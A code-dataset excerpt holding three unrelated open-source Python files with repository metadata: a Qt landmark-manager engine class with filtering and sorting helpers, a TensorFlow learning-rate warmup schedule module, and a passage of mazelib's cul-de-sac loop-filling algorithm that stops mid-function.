def managerUri(self):
'''
Returns the unique URI of this manager, which is built from the manager name and the parameters
used to construct it.
@rtype: basestring
'''
return LandmarkManager.buildUri(self.managerName(),
self.managerParameters(),
self.managerVersion())
def managerVersion(self):
'''
Returns the engine backend implementation version number
@rtype: int
'''
return 0
def landmarkIds(self, filter_, limit, offset, sortOrders, error=0,
errorString=""):
'''
Returns a list of landmark identifiers which match the given \a filter and are sorted according to
the given \a sortOrders. The \a limit defines the maximum number of landmark IDs to return and the
\a offset defines the index offset of the first landmark ID.
A \a limit of -1 means that IDs of all matching landmarks should be returned.
Any error which occurs will be saved in \a error and \a errorString.
@param filter_: A filer
@type filter_: LandmarkFilter
@param limit: Limit the results
@type limit: int
@param offset: Offset
@type offset: int
@param sortOrders: A list of SortOrders
@type sortOrders: list
@param error: Unused error ref
@type error: int
@param errorString: Unused errorString
@type errorString: str
@rtype: list
'''
return []
def categoryIds(self, limit, offset, nameSort, error=0, errorString=""):
'''
Returns a list of category identifiers
The \a limit defines the maximum number of IDs to return and the \a offset defines the index offset
of the first ID. A \a limit of -1 means IDs for all categories should be returned.
Any error which occurs will be saved in \a error and \a errorString.
The identifiers are returned in order according to the given \a nameSort.
@param limit: Result limit
@type limit: int
@param offset: Offsets the result
@type offset: int
@param nameSort: LandmarkSort param
@type nameSort: LandmarkSort
@param error: Unused Error param
@type error: int
@param errorString: Unused error param
@type errorString: str
@rtype: list
'''
return []
def landmark(self, landmarkId, error=0, errorString=""):
'''
Returns the landmark in the datastore identified by \a landmarkId.
Any errors encountered are:stored in \a error and \a errorString.
The \a error is set to QLandmarkManager::LandmarkDoesNotExistError if the landmark could not be found.
@param landmarkId: A landmark
@type landmarkId: LandmarkId
@param error: Unused Error param
@type error: int
@param errorString: Unused ErrorString param
@type errorString: str
@rtype: Landmark
'''
return Landmark()
def landmarks(self, idsOrFilter, errorMapOrSortOrder={}, error=0, errorString=""):
'''
Returns a list of landmarks which match the given \a landmarkIds. The engine will populate \a errorMap
(the map of indices of the \a landmarkIds list to errors) for the indexes where the landmark could not
be retrieved.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError,
all landmarks were successfully retrieved.
@param landmarkIds: A list/tuple of Ids
@type landmarkIds: list
@param errorMap: Unused dict of errors
@type errorMap: dict
@param error: Unused Error param
@type error: int
@param errorString: Unused errorString param
@type errorString: str
@rtype: list
'''
return []
def category(self, categoryId, error=0, errorString=""):
'''
Returns the category in the datastore identified by \a categoryId.
Any errors encountered are stored in \a error and \a errorString.
A QLandmarkManager::CategoryDoesNotExist error is set if the category could not be found.
@param categoryId: The id
@type categoryId: LandmarkCategoryId
@rtype: LandmarkCategory
'''
return LandmarkCategory()
def categories(self, idsOrLimit, offset=0, nameSort=None, error=0, errorString=""):
'''
Returns a list of categories which match the given \a categoryIds. The engine will populate \a errorMap
(the map of indices of the \a categoryIds list to errors) for the indexes where the category could not
be retrieved.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError, if
all categories were successfully retrieved.
@param idsOrLimit: ids or a limit
@type idsOrLimit: list or ind
@param offset: An offset
@type offset: int
@param nameSort: sortOrder
@type nameSort: LandmarkSortOrder
@rtype: list
'''
return []
def saveLandmark(self, landmark, error=0, errorString=""):
'''
Adds the given \a landmark to the datastore if \a landmark has a
default-constructed identifer, or an identifier with the manager
URI set to the URI of this manager and an empty id.
If the manager URI of the identifier of the \a landmark is neither
empty nor equal to the URI of this manager, or the id member of the
identifier is not empty, but does not exist in the manager,
the operation will fail and and \a error will be set to
\c QLandmarkManager::LandmarkDoesNotExistError.
Alternatively, the function will update the existing landmark in the
datastore if \a landmark has a non-empty id and currently exists
within the datastore.
Returns false on failure or true on success. On successful save
of a landmark with an empty id, it will be assigned a valid
id and have its manager URI set to the URI of this manager.
The engine must emit the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Any errors encountered during this operation should be stored in
\a error and \a errorString.
@param landmark: The Landmark
@type landmark: Landmark
@rtype: bool
'''
return False
def saveLandmarks(self, landmarks, errorMap={}, error=0, errorString=""):
'''
Adds the list of \a landmarks to the datastore.
Returns true if the landmarks were saved successfully, otherwise returns
false.
The engine will populate \a errorMap (the map of indices of the
\a landmarks list to errors) for every index for which the landmark could not be
saved.
For each newly saved landmark that was successful, the identifier
of the landmark will be updated with a new value.
The engine emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError,
if all \a landmarks were successfully saved.
@param landmarks: List of Landmarks
@type landmarks: list
@rtype: bool
'''
return False
def removeLandmark(self, landmarkId, error=0, errorString=""):
'''
Remove the landmark identified by \a landmarkId from the datastore.
Returns true if the landmark was removed successfully, otherwise
returnse false.
The engine emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Any errors encountered during this operation should be stored to
\a error and \a errorString.
@param landmarkId: The id
@type landmarkId: LandmarkId
@rtype: bool
'''
return False
def removeLandmarks(self, landmarkIds, errorMap={}, error=0,
errorString=""):
'''
Removes every landmark whose identifier is contained in the list
of \a landmarkIds. Returns true if all landmarks were removed
successfully, otherwise false.
The engine populates \a errorMap (the map of indices of the
\a landmarkIds list to errors) for every index for which the landmark could not be
removed.
The engine also emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Overall operation errors are stored in \a error and
\a errorString. \a error is set to QLandmarkManager::NoError, if
all landmarks were successfully removed.
@param landmarkIds: List of Ids
@type landmarkIds: list
@rtype: bool
'''
return False
def saveCategory(self, category, error=0, errorString=""):
'''
Adds the given \a category to the datastore if \a category has a
default-constructed identifier, or an identifier with the manager
URI set to the URI of this manager and an empty id.
If the manager URI of the identifier of the \a category is neither
empty nor equal to the URI of this manager, or the id member of the
identifier is not empty, but does not exist in the manager,
the operation should fail and \a error should be set to
\c QLandmarkManager::CategoryDoesNotExistError.
Alternatively, the function should update the existing category in the
datastore if \a category has a non-empty id and currently exists
within the datastore.
Returns false on failure or true on success. On successful save
of a category with an invalid id, it should be assigned a valid
id and have its manager URI set to the URI of this manager.
The engine returns the appropriate signals to inform clients of changes
to the datastore resulting from this operation.
Overall operations errors should be stored in \a error and
\a errorString.
@param category: LandmarkCatgory
@type category: LandmarkCatgory
@rtype: bool
'''
return False
def removeCategory(self, categoryId, error=0, errorString=''):
'''
Removes the category identified by \a categoryId from the datastore.
Returns true if the category was removed successfully, otherwise
returnse false.
The engine emits the appropriate signals to inform clients of changes
to the datastore resulting from this operation
Overall operational errors are stored in \a error and
\a errorString.
@param categoryId: The id
@type categoryId: LandmarkCategoryId
@rtype: bool
'''
return False
def importLandmarks(self, device, format, option, categoryId, error=0, errorString=""):
'''
Reads landmarks from the given \a device and saves them. The data from the \a device
is expected to adhere to the provided \a format. If no \a format is provided,
the manager engine tries to autodetect the \a format.
The \a option can be used to control whether categories in the imported
file will be added during the import. If the \c AttachSingleCategory option is used, then
all the landmarks in the import file are assigned to the category identified by
\a categoryId, in all other circumstances \a categoryId is ignored. If \a categoryId
doesn't exist when using \c AttachSingleCategory, QLandmarkManager::CategoryDoesNotExist error is returned. Note that
some file formats may not support categories at all.
Returns true if all landmarks could be imported, otherwise returns false.
Overall operational errors are stored in \a error and
\a errorString.
@param device: The device for reading or a string as filename
@type device: QIODevice
@param format_: Format String
@type format_: str
@param option: Transfer Option @see TransportOption Enum
@type option: int
@param categoryId: The CategoryId
@type categoryId: LandmarkCategoryId
@rtype: bool
'''
return False
def exportLandmarks(self, device, format, landmarkIds, option, error=0,
errorString=""):
'''
Writes landmarks to the given \a device. The landmarks will be written
according to the specified \a format. If \a landmarkIds is empty, then
all landmarks will be exported, otherwise only those landmarks that
match \a landmarkIds will be exported.
The \a option can be used to control whether categories will be exported or not.
Note that the \c AttachSingleCategory option has no meaning during
export and the manager will export as if \a option was \c IncludeCategoryData.
Also, be aware that some file formats may not support categories at all and for
these formats, the \a option is always treated as if it was \c ExcludeCategoryData.
Returns true if all specified landmarks were successfully exported,
otherwise returns false.
Overall operation errors are stored in \a error and
\a errorString.
@param device: The device for writing or a string as filename
@type device: QIODevice
@param format_: Format String
@type format_: str
@param option: Transfer Option @see TransportOption Enum
@type option: int
@param categoryId: The CategoryId
@type categoryId: LandmarkCategoryId
@rtype: bool
'''
return False
def supportedFormats(self, operation, error=0, errorString=""):
'''
Returns the supported file formats for the given transfer \a operation, i.e. import or export.
Errors are stored in \a error and \a errorString.
@see: TransferOperation Enum
@param operation: Type of operation as int
@type operation: int
@rtype: list
'''
return []
def filterSupportLevel(self, filter_, error=0, errorString=""):
'''
Returns the support level the manager engine provides for the given \a filter. Errors are stored in \a error
and \a errorString.
@param filter_:
@type filter_:
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: int
'''
raise NotImplementedError("Please implement filterSupportLevel()")
def sortOrderSupportLevel(self, sortOrder, error=0, errorString=""):
'''
Returns the support level the manager engine provides for the given \a sortOrder. Errors are stored in \a error
and \a errorString.
@param sortOrder:
@type sortOrder:
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: int
'''
raise NotImplementedError("Please implement sortOrderSupportLevel()")
def isFeatureSupported(self, feature, error=0, errorString=""):
'''
Returns true if the manager engine supports the given \a feature, otherwise returns false; Errors are stored in
\a error and \a errorString.
@param feature:
@type feature:
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: int
'''
raise NotImplementedError("Please implement isFeatureSupported()")
def isReadOnly(self, landmarkOrCategoryId=None, error=0, errorString=""):
'''
Returns true if the manager engine is exclusively read only. Meaning
landmarks and categories cannot be added, modified or removed. Errors are stored in \a error and \a errorString.
@param error:
@type error:
@param errorString:
@type errorString:
@rtype: bool
'''
raise NotImplementedError("Please implement isReadOnly()")
def searchableLandmarkAttributeKeys(self, error=0, errorString=""):
'''
Returns the list of landmark attribute keys that may be used in a QLandmarkAttributeFilter.
Errors are stored in \a error and \a errorString.
'''
raise NotImplementedError("Please implement searchableLandmarkAttributeKeys()")
def requestDestroyed(self, request):
'''
Notifies the manager engine that the given \a request has been destroyed.
@param request: The request
@type request: LandmarkAbstractRequest
'''
pass
def startRequest(self, request):
'''
Asks the manager engine to begin the given \a request
which is currently in a re(startable) state.
Returns true if the request was started successfully,
else returns false.
@param request: The request
@type request: LandmarkAbstractRequest
@rtype: bool
'''
return False
def cancelRequest(self, request):
'''
Asks the manager engine to cancel the given \a request which was
previously started and is currently in a cancellable state.
Returns true if cancelation of the request was started successfully,
otherwise returns false.
@param request: The request
@type request: LandmarkAbstractRequest
@rtype: bool
'''
def waitForRequestFinished(self, request, msecs):
'''
Blocks until the manager engine has completed the given \a request
which was previously started, or until \a msecs milliseconds have passed.
Returns true if the request was completed, and false if the request was not in the
\c QLandmarkAbstractRequest::Active state, no progress could be reported or
if the engine does not support waitForFinished functionality.
@param request: The request
@type request: LandmarkAbstractRequest
@param msecs: The milliseconds
@type msecs: int
@rtype: bool
'''
return False
@staticmethod
def updateRequestState(req, state):
'''
Updates the given asynchronous request \a req by setting the new \a state
of the request. If the new state is different, the stateChanged() signal will be emitted
by the request.
@param req: The request
@type req: LandmarkAbstractRequest
@param state: LandmarkAbstractRequest.State Enum
@type state: int
'''
if req:
ml = QMutexLocker(req._mutex)
if req._state != state:
req._state = state
ml.unlock()
req.stateChanged.emit(state)
@staticmethod
def updateLandmarkIdFetchRequest(req, result, error, errorString,
newState, resultProperty='_landmarkIds'):
'''
Updates the given QLandmarkIdFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkIdFetchRequest
@type req: LandmarkIdFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
if req:
ireq = req
ml = QMutexLocker(req._mutex)
req._error = error
req._errorString = errorString
if resultProperty:
req.__setattr__(resultProperty, result)
emitState = (req._state != newState)
req._state = newState
ml.unlock()
req.resultsAvailable.emit()
if emitState and ireq:
ireq.stateChanged(newState)
@staticmethod
def updateLandmarkFetchRequest(req, result, error, errorString,
newState):
'''
Updates the given QLandmarkFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkFetchRequest
@type req: LandmarkFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_landmarks')
@staticmethod
def updateLandmarkFetchByIdRequest(req, result, error,
errorString, newState):
'''
Updates the given QLandmarkFetchByIdRequest \a req with the latest \a result,
operation \a error and \a errorString and map of input index to individual errors, \a errorMap.
In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkFetchByIdRequest
@type req: LandmarkFetchByIdRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_landmarkIds')
@staticmethod
def updateLandmarkRemoveRequest(req, error, errorString, errorMap,
newState):
'''
Updates the given QLandmarkRemoveRequest \a req with the operation \a error and
\a errorString and map of input index to individual errors, \a errorMap. In addition,
the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkRemoveRequest
@type req: LandmarkRemoveRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, None, error,
errorString, newState,
'')
@staticmethod
def updateLandmarkSaveRequest(req, result, error, errorString,
errorMap, newState):
'''
Updates the given QLandmarkSaveRequest \a req with the latest \a result, operation \a error
and \a errorString, and map of input index to individual errors, \a errorMap.
In addition, the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkSaveRequest
@type req: LandmarkSaveRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_landmarks')
@staticmethod
def updateLandmarkCategoryIdFetchRequest(req, result, error,
errorString, newState):
'''
Updates the given QLandmarkCategoryIdFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryIdFetchRequest
@type req: LandmarkCategoryIdFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManager.updateLandmarkIdFetchRequest(req, result, error,
errorString, newState,
'_categoryIds')
@staticmethod
def updateLandmarkCategoryFetchRequest(req, result, error, errorString,
newState):
'''
Updates the given QLandmarkCategoryFetchRequest \a req with the latest \a result,
and operation \a error and \a errorString. In addition, the state of the request
will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryFetchRequest
@type req: LandmarkCategoryFetchRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_categories')
@staticmethod
def updateLandmarkCategoryFetchByIdRequest(req, result, error,
errorString, errorMap,
newState):
'''
Updates the given QLandmarkCategoryFetchByIdRequest \a req with the latest \a result,
and operation \a error and \a errorString, and map of input index to individual errors, \a errorMap.
In addition, the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the
request progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryFetchByIdRequest
@type req: LandmarkCategoryFetchByIdRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_categories')
@staticmethod
def updateLandmarkCategoryRemoveRequest(req, error, errorString,
errorMap, newState):
'''
Updates the given QLandmarkCategoryRemoveRequest \a req with the operation \a error and
\a errorString and map of input index to individual errors, \a errorMap. In addition,
the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategoryFetchByIdRequest
@type req: LandmarkCategoryFetchByIdRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, None,
error,
errorString,
newState,
'')
@staticmethod
def updateLandmarkCategorySaveRequest(req, result, error, errorString,
errorMap, newState):
'''
Updates the given QLandmarkSaveCategoryRequest \a req with the latest \a result, operation error \a error
and \a errorString, and map of input index to individual errors, \a errorMap.
In addition, the state of the request will be changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkCategorySaveRequest
@type req: LandmarkCategorySaveRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_categories')
@staticmethod
def updateLandmarkImportRequest(req, result, error, errorString,
newState):
'''
Updates the given QLandmarkImportRequest \a req with the operation \a error and \a errorString.
In addition the state of the request is changed to \a newState. This function may also be used
to update the \a ids of the landmarks which have been imported.
It then causes the request to emit its resultsAvailable() signal to notify the clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkImportRequest
@type req: LandmarkImportRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, result,
error,
errorString,
newState,
'_landmarkIds')
@staticmethod
def updateLandmarkExportRequest(req, error, errorString, newState):
'''
Updates the given QLandmarkExportRequest \a req with the operation \a error and \a errorString.
In addition the state of the request is changed to \a newState.
It then causes the request to emit its resultsAvailable() signal to notify the clients of the request
progress.
If the new request state is different from the previous state, the stateChanged() signal will
also be emitted from the request.
@param req: LandmarkExportRequest
@type req: LandmarkExportRequest
@param result: List of results
@type result: list
@param error: Unused
@type error: int
@param errorString: Unused
@type errorString: str
@param errorMap: Unused
@type errorMap: dict
@param newState: Unused
@type newState: int
'''
return LandmarkManagerEngine.updateLandmarkIdFetchRequest(req, None,
error,
errorString,
newState,
'')
@staticmethod
def compareLandmark(a, b, sortOrders):
'''
Compares two landmarks (\a a and \a b) using the given list of \a sortOrders. Returns a negative number if \a a should appear
before \a b according to the sort order, a positive number if \a a should appear after \a b according to the sort order,
and zero if the two are unable to be sorted.
@param a: Landmark 1
@type a: Landmark
@param b: Landmark 2
@type b: Landmark
@param sortOrders: List of LandmarkSortOrder Objects
@type sortOrders: list
@rtype: int
'''
comparison = 0
for sortOrder in sortOrders:
if sortOrder.type_() == LandmarkSortOrder.NameSort:
comparison = LandmarkManagerEngine.compareName(a, b, sortOrder)
break
else:
comparison = 0
if comparison != 0:
break
return comparison
@staticmethod
def compareName(a, b, nameSort):
'''
Compares two landmarks (\a a and \a b) by name.
Returns a negative number if \a a should appear before \a b according to the \a nameSort,
a positive number if \a a should appear after \a b according to the \a nameSort,
and zero if the two are unable to be sorted.
Assuming an ascending order sort, an integer less than, equal to, or greater than zero
is returned if \a a is less than, equal to or greater than \a b.
\a nameSort specifies whether an ascending or descending order is used and whether
the sort is case sensitive or not.
@param a: Landmark 1
@type a: Landmark
@param b: Landmark 2
@type b: Landmark
@param nameSort: LandmarkNameSort
@type nameSort: LandmarkNameSort
@rtype: int
'''
result = QString.compare(QString.fromUtf8(a.name()),
QString.fromUtf8(b.name()),
nameSort.caseSensitivity())
if nameSort.direction() == Qt.DescendingOrder:
result *= -1
return result
@staticmethod
def addSorted(sorted_, landmark, sortOrders):
'''
Performs an insertion sort \a landmark into the \a sorted list, according to the provided \a sortOrders list.
The first QLandmarkSortOrder in the list has the highest priority; if the \a landmark is deemed equal to another
in the \a sorted list, the second QLandmarkSortOrder in the list is used (and so on until either the landmark is inserted
or there are no more sort order objects in the list).
@param sorted_: The sorted list of Landmark(s)
@type sorted_: list
@param landmark: the landmark which will be inserted
@type landmark: Landmark
@param sortOrders: list of sortOrders
@type sortOrders: LandmarkSortOrder
'''
if len(sortOrders) > 0:
for i in range(len(sorted_)):
comparison = LandmarkManagerEngine.compareLandmark(sorted_[i],
landmark,
sortOrders)
if comparison > 0:
sorted_.insert(i, landmark)
return
#hasn't been inserted yet? append to the list.
sorted_.append(landmark)
@staticmethod
def testFilter(filter_, landmark):
'''
Returns true if the supplied \a landmark matches the supplied \a filter.
@param filter_: The filter to matches
@type filter_: LandmarkFilter
@param landmark: The landmark to test
@type landmark: Landmark
@rtype: bool
'''
filterType = filter_.type_()
if filterType == LandmarkFilter.DefaultFilter:
return True
elif filterType == LandmarkFilter.AttributeFilter:
filterKeys = filter_.attributeKeys()
if filter_.operationType() == LandmarkAttributeFilter.AndOperation:
lmAttributeValue = QVariant()
for filterKey in filterKeys:
if filterKey in commonLandmarkKeys:
lmAttributeValue = getLandmarkAttribute(filterKey,
landmark)
if lmAttributeValue.type() == QVariant.String:
lmString = lmAttributeValue.toString()
attribString = filter_.attribute(filterKey).toString()
if matchString(lmString, attribString,
filter_.matchFlags(filterKey)):
continue
elif filter_.attribute(filterKey) == lmAttributeValue:
continue
return False
else:
return False
return True
else: #Must be Or Operation
lmAttributeValue = QVariant()
for filterKey in filterKeys:
if filterKey in commonLandmarkKeys:
lmAttributeValue = getLandmarkAttribute(filterKey,
landmark)
if lmAttributeValue.type() == QVariant.String:
lmString = lmAttributeValue.toString()
attribString = filter_.attribute(filterKey).toString()
if matchString(lmString, attribString,
filter_.matchFlags(filterKey)):
return True
elif filter_.attribute(filterKey) == lmAttributeValue:
return True
return False
elif filterType == LandmarkFilter.BoxFilter:
if not filter_.boundingBox().isValid():
return False
tly = filter_.boundingBox().topLeft().latitude()
bry = filter_.boundingBox().bottomRight().latitude()
tlx = filter_.boundingBox().topLeft().longitude()
brx = filter_.boundingBox().bottomRight().longitude()
latWrap = (tly < bry)
longWrap = (tlx > brx)
if latWrap:
return False
#check if landmark is outside the box's latitudes
if landmark.coordinate().latitude() < bry and landmark.coordinate().latitude() > tly:
return False
lmx = landmark.coordinate().longitude()
if longWrap:
if ((lmx > 0.0) and (lmx<= tlx)) or ((lmx < 0.0) and (lmx >= brx)):
return False
else:
if lmx < tlx or lmx > brx:
return False;
#landmark must be within the bounds to reach here.
return True
elif filterType == LandmarkFilter.CategoryFilter:
categories = landmark.categoryIds()
for categoryId in categories:
if filter_.categoryId() == categoryId:
return True
return False
elif filterType == LandmarkFilter.IntersectionFilter:
terms = filter_.filters()
if len(terms) == 0:
return False
for term in terms:
if not LandmarkManagerEngine.testFilter(term, landmark):
return False
return True
elif filterType == LandmarkFilter.LandmarkIdFilter:
ids = filter_.landmarkIds()
for id_ in ids:
if id_ == landmark.landmarkId():
return True
return False
elif filterType == LandmarkFilter.InvalidFilter:
return False
elif filterType == LandmarkFilter.NameFilter:
return matchString(landmark.name(), filter_.name(),
filter_.matchFlags())
elif filterType == LandmarkFilter.ProximityFilter:
distance = filter_.center().distanceTo(landmark.coordinate())
if distance < filter_.radius() or distance == filter_.radius():
return True
else:
return False
elif filterType == LandmarkFilter.UnionFilter:
terms = filter_.filters()
if len(terms) == 0:
return False
else:
for term in terms:
if LandmarkManagerEngine.testFilter(filter_, landmark):
return True
return False
return False
@staticmethod
def sortLandmarks(landmarks, sortOrders):
'''
Sorts the given list of \a landmarks according to the provided \a sortOrders
@param landmarks: The landmarks
@type landmarks: list
@param sortOrders: The orders
@type sortOrders: list
@return: A List with LandmarkIds!
@rtype: list
'''
landmarkIds = []
sortedLandmarks = []
if len(sortOrders):
for landmark in landmarks:
LandmarkManagerEngine.addSorted(sortedLandmarks, landmark,
sortOrders)
for landmark in sortedLandmarks:
landmarkIds.append(landmark)
else:
for landmark in landmarks:
landmarkIds.append(landmark.landmarkId())
return landmarkIds
|
mit
| 41,353,620,293,936,170 | 40.138825 | 134 | 0.594545 | false |
tensorflow/tpu
|
models/official/detection/modeling/learning_rates.py
|
1
|
3708
|
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Learning rate schedule."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from six.moves import zip
import tensorflow.compat.v1 as tf
def step_learning_rate_with_linear_warmup(global_step,
init_learning_rate,
warmup_learning_rate,
warmup_steps,
learning_rate_levels,
learning_rate_steps):
"""Creates the step learning rate tensor with linear warmup."""
linear_warmup = (warmup_learning_rate +
tf.cast(global_step, dtype=tf.float32) / warmup_steps *
(init_learning_rate - warmup_learning_rate))
learning_rate = tf.where(global_step < warmup_steps,
linear_warmup, init_learning_rate)
for next_learning_rate, start_step in zip(learning_rate_levels,
learning_rate_steps):
learning_rate = tf.where(global_step >= start_step,
next_learning_rate, learning_rate)
return learning_rate
def cosine_learning_rate_with_linear_warmup(global_step,
init_learning_rate,
warmup_learning_rate,
warmup_steps,
total_steps):
"""Creates the cosine learning rate tensor with linear warmup."""
global_step = tf.cast(global_step, dtype=tf.float32)
linear_warmup = (warmup_learning_rate + global_step / warmup_steps *
(init_learning_rate - warmup_learning_rate))
cosine_learning_rate = (
init_learning_rate * (tf.cos(
np.pi * (global_step - warmup_steps) / (total_steps - warmup_steps))
+ 1.0) / 2.0)
learning_rate = tf.where(global_step < warmup_steps,
linear_warmup, cosine_learning_rate)
return learning_rate
def learning_rate_generator(params, total_steps):
"""The learning rate function generator."""
if params.type == 'step':
return functools.partial(
step_learning_rate_with_linear_warmup,
init_learning_rate=params.init_learning_rate,
warmup_learning_rate=params.warmup_learning_rate,
warmup_steps=params.warmup_steps,
learning_rate_levels=params.learning_rate_levels,
learning_rate_steps=params.learning_rate_steps)
elif params.type == 'cosine':
return functools.partial(
cosine_learning_rate_with_linear_warmup,
init_learning_rate=params.init_learning_rate,
warmup_learning_rate=params.warmup_learning_rate,
warmup_steps=params.warmup_steps,
total_steps=total_steps)
else:
raise ValueError('Unsupported learning rate type: {}.'.format(params.type))
|
apache-2.0
| -1,571,703,288,276,951,000 | 42.623529 | 80 | 0.598166 | false |
theJollySin/mazelib
|
mazelib/transmute/CuldeSacFiller.py
|
1
|
3054
|
# If the code is not Cython-compiled, we need to add some imports.
from cython import compiled
if not compiled:
from mazelib.transmute.MazeTransmuteAlgo import MazeTransmuteAlgo
class CuldeSacFiller(MazeTransmuteAlgo):
""" This algorithm could be called LoopFiller, because it breaks up loop in the maze.
1. Scan the maze, looking for cells with connecting halls that go in exactly two directions.
2. At each of these places, travel in both directions until you find your first intersection.
3. If the first intersection for both paths is the same, you have a loop.
4. Fill in the cell you started at with a wall, breaking the loop.
"""
def _transmute(self):
""" Master methot to fill in all the loops in the maze
Returns: None
"""
for r in range(1, self.grid.shape[0], 2):
for c in range(1, self.grid.shape[1], 2):
if (r, c) in (self.start, self.end):
# we don't want to block off an exit
continue
elif self.grid[(r, c)] == 1:
# it's a wall, who cares
continue
# determine if we could even possibly be in a loop
ns = self._find_unblocked_neighbors((r, c))
if len(ns) != 2:
continue
# travel in both directions until you hit the first intersection
try:
end1 = self._find_next_intersection([(r, c), ns[0]])
end2 = self._find_next_intersection([(r, c), ns[1]])
except AssertionError:
continue
# Found a loop!
if end1 == end2:
self.grid[(r, c)] = 1
def _find_next_intersection(self, path_start):
""" Starting with the first two cells in a path, follow the path until you hit the next
intersection (or dead end)
Args:
path_start (list): the first two cells (tuples) in the path you want to travel
Returns:
tuple: the location of the first intersection (or dead end) in the maze
"""
assert len(path_start) == 2, "invalid starting path to travel"
# save off starting positions for comparisons later
first = path_start[0]
previous = path_start[0]
current = path_start[1]
# keep traveling until you hit an intersection
ns = self._find_unblocked_neighbors(current)
while len(ns) == 2:
# travel away from where you came from
